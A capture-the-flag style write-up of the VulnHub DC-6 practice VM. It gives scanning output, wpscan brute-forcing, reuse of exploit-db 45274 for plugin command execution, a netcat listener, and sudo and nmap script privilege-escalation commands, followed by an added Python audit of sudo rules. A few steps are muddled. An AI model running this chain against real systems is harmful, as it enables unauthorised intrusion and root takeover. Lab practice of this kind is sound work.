Penetration testing practice VM on vulnhub: DC-6 hands-on notes
Information gathering
.\fscan64.exe -h 192.168.1.0/24
fscan version: 1.8.2
start infoscan
(icmp) Target 192.168.1.1 is alive
(icmp) Target 192.168.1.53 is alive
(icmp) Target 192.168.1.100 is alive
(icmp) Target 192.168.1.108 is alive
(icmp) Target 192.168.1.110 is alive
(icmp) Target 192.168.1.104 is alive
[*] Icmp alive hosts len is: 6
192.168.1.108:7680 open
192.168.1.108:445 open
192.168.1.53:22 open
192.168.1.100:80 open
192.168.1.108:443 open
192.168.1.108:139 open
192.168.1.100:22 open
192.168.1.108:3306 open
192.168.1.108:135 open
192.168.1.1:80 open
[*] alive ports len is: 10
start vulscan
[*] NetInfo:
[*]192.168.1.108
[->]yesir
[->]192.168.1.108
[->]192.168.59.1
[->]192.168.56.1
[->]10.10.10.1
[->]10.10.1.1
[->]169.254.79.122
[*] WebTitle: https://192.168.1.108 code:403 len:0 title:None
[*] WebTitle: http://192.168.1.1 code:200 len:819 title:TL-WDR5660
[+] SSH:192.168.1.53:22:root 123456
[*] WebTitle: http://192.168.1.100 code:301 len:0 title:None 跳转url: http://wordy/
已完成 9/10 [-] ssh 192.168.1.100:22 root test ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 9/10 [-] ssh 192.168.1.100:22 root Aa123456! ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 9/10 [-] ssh 192.168.1.100:22 admin Passw0rd ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
The target host 192.168.1.100 has been identified.
Visiting it redirects to http://wordy/, which does not resolve, so the hosts file needs a new line: 192.168.1.100 wordy
Port scan with nmap
└─$ nmap -A 192.168.1.100 -p-
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-05 16:21 CST
Nmap scan report for 192.168.1.100
Host is up (0.00025s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)
| 256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)
|_ 256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Did not follow redirect to http://wordy/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.39 seconds
zsh: segmentation fault nmap -A 192.168.1.100 -p-
Ports 80 and 22 are open; start with port 80.
Gathering website information
Some information about the site, gathered with a browser plugin:
The target site runs WordPress.
Scanning with wpscan turned up the following users:
Save the users to a dictionary file. With the usernames enumerated, the wordlist shipped with Kali is used as the password file. One detail worth noting: according to the description on the official page, the DC-6 wordlist can be filtered down, which greatly reduces brute-forcing time.
└─$ cat /usr/share/wordlists/rockyou.txt | grep k01 > pass.txt
Brute-force the users
└─$ wpscan --url http://wordy/ -U user.txt -P pass.txt
The brute-force succeeds with the password helpdesk01; log in to the admin panel.
A plugin is found.
Look up exploit information for the vulnerability in Kali.
Exploitation
cp /usr/share/exploitdb/exploits/php/webapps/45274.html 45274.html # copy to the desktop
vim 45274.html # edit it
Two places need to be modified; remember to remove the -lnvp argument.
Start a listener on Kali: nc -nlvp 192.168.1.53 9999
Switch to an interactive shell
python -c "import pty;pty.spawn('/bin/bash')"
A file found under /home/mark/stuff records the password GSo7isUM1D4 for the user graham.
Switch user
sudo -l
Using nano, replace the contents of the original backups.sh script with:
/bin/sh
echo 'os.execute("/bin/bash")' > root.nse
Then run the script with sudo -u jens /home/jens/backups.sh to obtain a shell as jens.
Go to /tmp. The nmap --script option can execute scripts.
echo 'os.execute("/bin/bash")'>getroot.sh
sudo nmap --script=getroot.sh
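As an added defensive check (not part of the original write-up), the following Python function scans sudo -l style output for the two weaknesses this escalation chain depends on: a rule that points at a script in a user-writable directory, and a rule that grants a binary such as nmap whose own options execute arbitrary code. The sample rules and the binary list are constructed assumptions for this example.

```python
import re
from pathlib import PurePosixPath

# Binaries whose documented options run arbitrary code as the sudo target;
# nmap --script (the case used above) is the one of interest. The list is an
# assumption for this example, not an exhaustive catalogue.
CODE_EXEC_BINARIES = {"nmap", "vim", "nano", "python", "python3", "perl", "bash", "sh"}
# Directories an unprivileged user can normally write to.
USER_WRITABLE_PREFIXES = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/")

# One 'sudo -l' rule line: "(runas) TAG: TAG: /path/cmd args, /path/other"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

def audit_rule(rule: str) -> list[str]:
    """Return findings for one rule line; header lines yield no findings."""
    m = RULE_RE.match(rule)
    if not m:
        return []
    runas = m.group("runas").strip()
    findings = []
    for cmd in m.group("cmds").split(","):
        parts = cmd.strip().split()
        if not parts:
            continue
        path = parts[0]
        if path.startswith(USER_WRITABLE_PREFIXES):
            findings.append(f"{path} (as {runas}): command file sits in a user-writable "
                            "directory; the invoking user may be able to replace it")
        if PurePosixPath(path).name in CODE_EXEC_BINARIES:
            findings.append(f"{path} (as {runas}): binary can run arbitrary code via its "
                            "own options; restrict arguments or use a fixed wrapper")
    return findings

def audit_sudo_output(text: str) -> list[str]:
    """Audit every line of 'sudo -l' output and collect all findings."""
    return [f for line in text.splitlines() for f in audit_rule(line)]

# Constructed sample mirroring the two rules the steps above chain together.
SAMPLE_SUDO_L = """\
User mark may run the following commands on wordy:
    (jens) NOPASSWD: /home/jens/backups.sh
User jens may run the following commands on wordy:
    (root) NOPASSWD: /usr/bin/nmap
"""

if __name__ == "__main__":
    for finding in audit_sudo_output(SAMPLE_SUDO_L):
        print(finding)
```

The check only inspects rule text; on a real host, confirm file ownership and permissions of each flagged path as well.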
Get the flag
Summary
- Brute-forcing user passwords with wpscan
- Remote command execution vulnerability in the **Activity monitor** plugin
- Privilege escalation via nmap script execution
If it is what you hope for, it will surely get a strong response.